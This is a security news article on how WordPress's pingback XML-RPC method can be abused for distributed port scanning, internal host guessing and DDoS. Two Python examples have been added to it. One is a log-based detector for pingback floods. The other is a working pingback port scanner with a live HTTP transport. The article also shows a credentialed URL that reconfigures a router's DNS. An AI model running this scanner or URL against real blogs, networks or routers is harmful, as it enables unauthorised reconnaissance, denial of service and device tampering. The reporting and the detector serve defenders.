SecurityWeek

Application Security
Pingback Function in WordPress Vulnerable To Malicious Use, Serves As Attack Tool

A vulnerability (or, more precisely, an unintended function) in WordPress that was dismissed six years ago as something not worth bothering with is getting a second look now that the issue has been exposed to a wider audience. The problem is that the pingback function can be used to map remote hosts, which can have problematic results for organizations running the blogging platform.

Pingbacks are a way for a blog owner to see who is linking to their posts: the linking site calls the pingback method of the target blog's XML-RPC interface with a source URL and a target URL, and the target blog fetches the source URL to confirm that it really links back. Six years ago it was discovered that, because that source URL is supplied by the caller, the feature can be used to scan remote hosts (internal networks as well as Internet-facing systems) simply by pointing the pingback at the host and port of interest.

This distributed scanning capability, clearly not intended when pingbacks were added to the XML-RPC API, can be turned into a DDoS tool as well as a source of information exposure.

The problem is that when the issue was first brought to WordPress’ attention, it was dismissed. “There are so many ways to orchestrate a DDOS, I don’t know if this is worth bothering with,” commented WordPress developer Ryan Boren at the time. 

Now, a new tool has been released that automates abuse of the pingback vulnerability.

“WordPress exposes a so called Pingback API to link to other blog posts. Using this feature you can scan other hosts on the intra- or internet via this server. You can also use this feature for some kind of distributed port scanning: You can scan a single host using multiple WordPress Blogs exposing this API,” the tool’s instructions explain.

Organizations that host their own WordPress installations are at risk, and so are the countless installations sitting on hosting providers' servers. That exposure is amplified because WordPress is often offered as a one-click install with hosting account promotions, and millions of installations have been left abandoned.

“From the tests I’ve carried out, I’ve seen that WordPress is also supporting URLs with credentials,” explains Acunetix’s Bogdan Calin.


According to his notes, an attacker could use a URL like the one below to reconfigure the internal router.

http://admin:[email protected]/changeDNS.asp?newDNS=aaaa

“This can also be used for distributed DOS (Denial of Service) attacks. An attacker can contact a large number of blogs and ask them to pingback a target URL. All of these blogs will attack the target URL,” he adds.
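On the receiving end, the flood Calin describes shows up in the target's web server logs as many verification fetches for the same URL from many different blogs, each carrying the blog's own HTTP user agent. The detector below is an added example in Python, not code from the article or from WordPress: it parses combined-format access log lines and flags any path fetched by at least five distinct WordPress blogs inside a 60-second window. The log lines are constructed for the example, and the user-agent shape "WordPress/<version>; <blog URL>" is an assumption about an unmodified WordPress install.

```python
"""Spotting a distributed pingback flood in the target's access log.

Added example, not from the article or from WordPress. Log lines are
constructed; the user-agent shape assumed for an unmodified WordPress
install is "WordPress/<version>; <blog URL>".
"""
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A blog verifying a pingback fetches the source URL with its default
# HTTP client user agent, which names the blog itself (assumption).
WP_UA_RE = re.compile(r"^WordPress/(?P<ver>[\d.]+); (?P<blog>\S+)")

# Constructed sample: six blogs fetch /big-page within seconds of each other,
# one ordinary browser hit, one repeat from blog-a, and one lone pingback
# fetch for a different post that should not be flagged.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2012:14:03:01 +0000] "GET /big-page HTTP/1.1" 200 52311 "-" "WordPress/3.5; http://blog-a.example"
203.0.113.11 - - [10/Dec/2012:14:03:02 +0000] "GET /big-page HTTP/1.1" 200 52311 "-" "WordPress/3.4.2; http://blog-b.example"
203.0.113.12 - - [10/Dec/2012:14:03:02 +0000] "GET /big-page HTTP/1.1" 200 52311 "-" "WordPress/3.5; http://blog-c.example"
198.51.100.7 - - [10/Dec/2012:14:03:03 +0000] "GET /big-page HTTP/1.1" 200 52311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0"
203.0.113.13 - - [10/Dec/2012:14:03:04 +0000] "GET /big-page HTTP/1.1" 200 52311 "-" "WordPress/3.5; http://blog-d.example"
203.0.113.10 - - [10/Dec/2012:14:03:05 +0000] "GET /big-page HTTP/1.1" 200 52311 "-" "WordPress/3.5; http://blog-a.example"
203.0.113.14 - - [10/Dec/2012:14:03:06 +0000] "GET /big-page HTTP/1.1" 200 52311 "-" "WordPress/3.3.1; http://blog-e.example"
203.0.113.15 - - [10/Dec/2012:14:03:07 +0000] "GET /big-page HTTP/1.1" 200 52311 "-" "WordPress/3.5; http://blog-f.example"
203.0.113.10 - - [10/Dec/2012:14:03:09 +0000] "GET /other-post HTTP/1.1" 200 9001 "-" "WordPress/3.5; http://blog-a.example"
""".splitlines()


def parse_line(line):
    """Parse one combined-format line; attach the pinging blog's URL if the
    user agent is WordPress's default, else None. Returns None on no match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ua = WP_UA_RE.match(rec["ua"])
    rec["blog"] = ua.group("blog") if ua else None
    return rec


def find_pingback_floods(lines, window_s=60, min_blogs=5):
    """Return {path: sorted list of blogs} for every path fetched by at least
    min_blogs distinct WordPress blogs within some window_s-second window.
    Distinct blogs, not request count, is the signal: one blog re-verifying
    a pingback is normal; dozens doing it for the same URL at once is not."""
    by_path = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["blog"]:
            by_path[rec["path"]].append((rec["ts"], rec["blog"]))
    floods = {}
    for path, events in by_path.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            in_window = {
                blog for t, blog in events[i:]
                if (t - t0).total_seconds() <= window_s
            }
            if len(in_window) >= min_blogs:
                floods[path] = sorted(in_window)
                break
    return floods


if __name__ == "__main__":
    for path, blogs in find_pingback_floods(SAMPLE_LOG).items():
        print(f"{path}: {len(blogs)} blogs in 60s -> {', '.join(blogs)}")
```

The same grouping, keyed on the blog URL instead of the path, gives the list of blogs to notify or block; a legitimate pingback produces one fetch from one blog, so a threshold of a handful of distinct blogs per URL per minute is conservative.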

Moreover, attackers can abuse the pingback to guess hosts inside the internal network: source URLs such as http://subversion/, http://bugzilla/, or http://dev/ can be used to check whether those hosts exist internally, because the blog's attempt to fetch them succeeds or fails accordingly.
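The probing described in the tool's instructions and in the internal-host guessing above, as an added example in Python (not code from the article, from WordPress, or from the scanner tool it mentions): it builds the pingback.ping XML-RPC call, maps the blog's fault codes to a verdict about the host and port named in the source URL, and runs against a simulated blog so the example works offline. The blog and post URLs, the probed host 10.0.0.5 and the port list are made up; the fault-code meanings (16, 17, 33, 48) are an assumption drawn from WordPress's pingback handler; a real run would pass the http_post transport instead of the simulation.

```python
"""Probing hosts through a WordPress blog's pingback.ping method.

Added example (not the article's, WordPress's or the scanner tool's code).
Fault-code meanings are an assumption drawn from WordPress's pingback
handler; the blog, post, host and ports below are made up.
"""
import xmlrpc.client
from urllib.parse import urlsplit
from urllib.request import Request, urlopen

# What each XML-RPC fault from pingback.ping tells the caller about the
# source URL the blog was asked to fetch (assumed WordPress fault codes).
FAULT_MEANING = {
    16: "closed: blog could not fetch the source URL",
    17: "open: blog fetched the source URL but found no link to the target",
    33: "bad target: URL is not a pingback-enabled post on this blog",
    48: "already registered: same source/target pair seen before, vary the path",
}


def build_pingback_request(source_uri, target_uri):
    """XML body of pingback.ping(source, target). The blog fetches source_uri
    to check that it links to target_uri; that fetch is the abusable step."""
    return xmlrpc.client.dumps(
        (source_uri, target_uri), methodname="pingback.ping"
    ).encode()


def classify_response(body):
    """Turn the blog's XML-RPC reply into a verdict on the probed source."""
    try:
        xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return FAULT_MEANING.get(
            fault.faultCode, f"fault {fault.faultCode}: {fault.faultString}"
        )
    return "open: pingback accepted, source really links to the target"


def http_post(url, body):
    """Real transport: POST the XML-RPC call to the blog's xmlrpc.php."""
    req = Request(url, data=body, headers={"Content-Type": "text/xml"})
    with urlopen(req, timeout=60) as resp:
        return resp.read()


def probe_ports(blog_xmlrpc, target_post, host, ports, post=http_post):
    """Ask the blog to verify a pingback from http://host:port/<unique path>
    for each port; the unique path sidesteps fault 48 on repeated probes."""
    verdicts = {}
    for port in ports:
        source = f"http://{host}:{port}/probe-{port}"
        reply = post(blog_xmlrpc, build_pingback_request(source, target_post))
        verdicts[port] = classify_response(reply)
    return verdicts


def fault_response(code, text):
    """XML-RPC fault document in the form a WordPress blog returns."""
    return xmlrpc.client.dumps(
        xmlrpc.client.Fault(code, text), methodresponse=True
    ).encode()


def simulated_blog(open_ports):
    """Constructed stand-in for a blog's xmlrpc.php so the example runs offline:
    fault 17 when something listens on the probed port, fault 16 otherwise."""
    def post(url, body):
        (source, _target), method = xmlrpc.client.loads(body)
        if method != "pingback.ping":
            return fault_response(-32601, "requested method not found")
        port = urlsplit(source).port or 80
        if port in open_ports:
            return fault_response(17, "The source URL does not contain a link "
                                      "to the target URL.")
        return fault_response(16, "The source URL does not exist.")
    return post


if __name__ == "__main__":
    blog = simulated_blog({80, 8080})  # pretend 10.0.0.5 serves HTTP on these
    results = probe_ports(
        "http://blog.example/xmlrpc.php", "http://blog.example/?p=1",
        "10.0.0.5", [22, 80, 443, 8080], post=blog,
    )
    for port, verdict in results.items():
        print(f"10.0.0.5:{port:<5} {verdict}")
```

The distributed variant is the same loop over a list of blogs, each asked about a different slice of ports. Each probe costs the blog's own HTTP connect timeout against a closed port, so scanning a large port range through one blog is slow, which is why the tool spreads the work across many of them.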

Unfortunately, only a patch will fully resolve this issue: switching off pingbacks in the blog's Discussion settings does not close it, because that setting only changes the default for new posts and leaves the XML-RPC endpoint (xmlrpc.php) reachable.

“These are known weaknesses with the pingback system and there are core WordPress.org developers working on counter-measures to harden against this type of abuse for future versions of WordPress,” a spokesperson from WordPress (Automattic) told SecurityWeek via email.
